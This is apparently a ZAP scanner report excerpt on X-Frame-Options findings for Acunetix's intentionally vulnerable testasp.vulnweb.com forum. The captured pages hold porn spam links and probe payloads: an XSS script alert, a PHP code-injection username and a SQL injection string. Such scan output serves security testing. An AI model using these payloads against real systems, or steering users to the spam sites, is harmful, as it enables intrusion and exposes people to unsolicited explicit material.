class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Free Porn Pictures and Best HD Sex Photos </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>dianezg60</b> on 3/13/2022 11:25:30 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Free Porn Pictures and Best HD Sex Photos - 185.220.102.248</div><div class='posttext'>Daily updated super sexy photo galleries http://abiquiu.lexixxx.com/?felicia free hot top porn web free gay porn clips video shorties categorized porn moviewas fanfiction naruto porn stories asian pics xxx asia quest porn </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=36 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4174 |
| Response Body - size: 4,174 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum test </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/test </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>hanxuan</b> on 3/14/2022 1:14:17 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>test - 180.75.236.192</div><div class='posttext'><script>alert("HI")</script></div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=37 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4421 |
| Response Body - size: 4,421 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Hot photo galleries blogs and pictures </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Hot photo galleries blogs and pictures </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>sethpq11</b> on 3/14/2022 2:11:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Hot photo galleries blogs and pictures - 95.214.54.97</div><div class='posttext'>My new hot project|enjoy new website http://videoonly.hotnatalia.com/?danielle party in limo porn real family orgy porn donna kane porn video top 100 porn stars list balls touching porn </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=38 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4138 |
| Response Body - size: 4,138 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Mr. </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Mr. </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>${@print(md5(31337))}\</b> on 3/14/2022 4:18:48 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Mr. - 54.208.242.36</div><div class='posttext'>555</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=39 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4374 |
| Response Body - size: 4,374 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Shemale Sexy Galleries </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Shemale Sexy Galleries </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>ineshy11</b> on 3/14/2022 6:42:20 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Shemale Sexy Galleries - 185.107.47.171</div><div class='posttext'>Enjoy daily galleries http://gay.porn.porn.miyuhot.com/?amara allentown pa highschool porn ebony male porn biggest list of porn asian free videos porn free lesbian hot women porn video </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=4 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4139 |
| Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="1" -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=40 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 4491 |
| Response Body - size: 4,491 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Nude Sex Pics, Sexy Naked Women, Hot Girls Porn </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>myrnaou3</b> on 3/14/2022 7:22:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Nude Sex Pics, Sexy Naked Women, Hot Girls Porn - 185.220.101.42</div><div class='posttext'>Hot galleries, daily updated collections http://dawnyangporn.momroleplayporn.adablog69.com/?martha indiana born porn star free female solo porn upload your amateur porn vids free porn bisexual videos step dads force girls porn </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=5 |
| Method | GET |
| Parameter | X-Frame-Options |
| Attack | |
| Evidence | |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:26 GMT Content-Length: 4130 |
| Response Body - size: 4,130 bytes. |
